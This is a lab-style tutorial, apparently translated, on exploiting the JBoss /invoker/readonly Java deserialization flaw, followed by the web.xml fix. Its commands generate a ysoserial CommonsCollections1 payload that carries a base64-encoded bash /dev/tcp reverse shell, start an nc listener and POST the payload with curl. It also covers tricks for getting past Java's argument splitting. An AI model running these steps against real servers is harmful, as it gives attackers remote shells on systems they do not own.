Java serialization stream header: AC ED 00 05 (STREAM_MAGIC 0xACED followed by STREAM_VERSION 5; when the stream is base64-encoded it starts with rO0AB)
Serialization

    // Write the object graph reachable from `st` to `file` as a Java serialization stream
    FileOutputStream fos = new FileOutputStream(file);
    ObjectOutputStream oos = new ObjectOutputStream(fos);
    oos.writeObject(st);

Deserialization

    // readObject() instantiates whatever classes the stream names before the cast to Student is evaluated
    FileInputStream fis = new FileInputStream(file);
    ObjectInputStream ois = new ObjectInputStream(fis);
    Student st1 = (Student) ois.readObject();
    // ReadOnlyAccessFilter.doFilter() from http-invoker.sar, the filter behind /invoker/readonly
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
        throws IOException, ServletException
    {
        HttpServletRequest httpRequest = (HttpServletRequest)request;
        Principal user = httpRequest.getUserPrincipal();
        // Only unauthenticated requests take this branch
        if ((user == null) && (this.readOnlyContext != null))
        {
            ServletInputStream sis = request.getInputStream();
            ObjectInputStream ois = new ObjectInputStream(sis);
            MarshalledInvocation mi = null;
            try
            {
                // The attacker-controlled request body is deserialized here; the cast runs after readObject()
                mi = (MarshalledInvocation)ois.readObject();
            }
            catch (ClassNotFoundException e)
            {
                throw new ServletException("Failed to read MarshalledInvocation", e);
            }
            request.setAttribute("MarshalledInvocation", mi);
            mi.setMethodMap(this.namingMethodMap);
            Method m = mi.getMethod();
            if (m != null) {
                validateAccess(m, mi);
            }
        }
        chain.doFilter(request, response);
    }
The filter takes the request body straight from the HTTP request and, when the request carries no authenticated principal, hands the stream to readObject() without any check or filtering of the classes it names. The cast to MarshalledInvocation only happens after readObject() has returned, so any gadget chain in the stream has already executed by the time the cast could fail. This is the Java deserialization vulnerability.
Encoding java.lang.Runtime.exec() payloads

Reference: "java反序列化工具ysoserial分析" (an analysis of the ysoserial Java deserialization tool) by angelwhu.
Run `firefox http://172.16.12.2:8080` in a terminal to open the target's default JBoss page, then browse to the vulnerable endpoint http://172.16.12.2:8080/invoker/readonly. The response is HTTP 500 (Internal Server Error: a server-side program such as a CGI, ASP or JSP handler failed). That fits the filter code above: a plain GET has no serialized object in its body, so ObjectInputStream fails while reading the stream, which suggests the server Java-deserializes whatever POST body the user submits.
POC (Proof of Concept): use a bash reverse shell and catch it with nc. After downloading ysoserial from GitHub and reading its source, you can see that the payload runs the command through Runtime.getRuntime().exec(String cmd). That overload delegates to Runtime.getRuntime().exec(String command, String[] envp, File dir), and a command written as a single string is split into argv by the code below:
    /**
     * Constructs a string tokenizer for the specified string. The
     * tokenizer uses the default delimiter set, which is
     * <code>" \t\n\r\f"</code>: the space character,
     * the tab character, the newline character, the carriage-return character,
     * and the form-feed character. Delimiter characters themselves will
     * not be treated as tokens.
     *
     * @param str a string to be parsed.
     * @exception NullPointerException if str is <CODE>null</CODE>
     */
    public StringTokenizer(String str) {
        this(str, " \t\n\r\f", false);
    }
Because there are no quoting rules in this split, the command

    bash -c `bash -i >& /dev/tcp/127.0.0.1/21 0>&1`

reaches the operating system as the argv

    bash
    -c
    `bash
    -i
    >&
    /dev/tcp/127.0.0.1/21
    0>&1`

so bash is started with the script "`bash" and the remaining pieces as positional parameters; the quotes are never interpreted by a shell.
The command therefore has to be encoded: use the encoding website with the bash option ticked.

Note: on Linux, ${IFS} can also serve as the encoding. The value of IFS is the bytes 0x20 0x09 0x0a (space, tab, newline), but the literal text ${IFS} contains no whitespace, so Java's tokenizer does not split it, and it can be used in the command that writes a webshell. Be aware that once ${IFS} is expanded the command contains whitespace again: in a redirection, a file name that contains whitespace is parsed incompletely and the write fails, and in the reverse-shell command it produces an "ambiguous redirect" error.
Generate the payload with ysoserial:

    java -jar ysoserial.jar [payload] '[command]'
    java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTEuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

The base64 decodes to `bash -i >& /dev/tcp/172.16.11.2/6666 0>&1`, so the listener runs on the attacker host 172.16.11.2. Start the listener, then POST the serialized object as the raw request body:

    nc -l -p 6666
    curl http://172.16.12.2:8080/invoker/readonly --data-binary @poc.ser
The fix concerns the http-invoker.sar component. In the web.xml under http-invoker.sar, inside the security-constraint element, the entry <url-pattern>/*</url-pattern> puts the whole http invoker component under access control. Since the doFilter code above only deserializes the body when getUserPrincipal() returns null, requiring authentication for every path removes the unauthenticated readObject() path.

Original article: https://www.cnblogs.com/ikari/p/8989821.html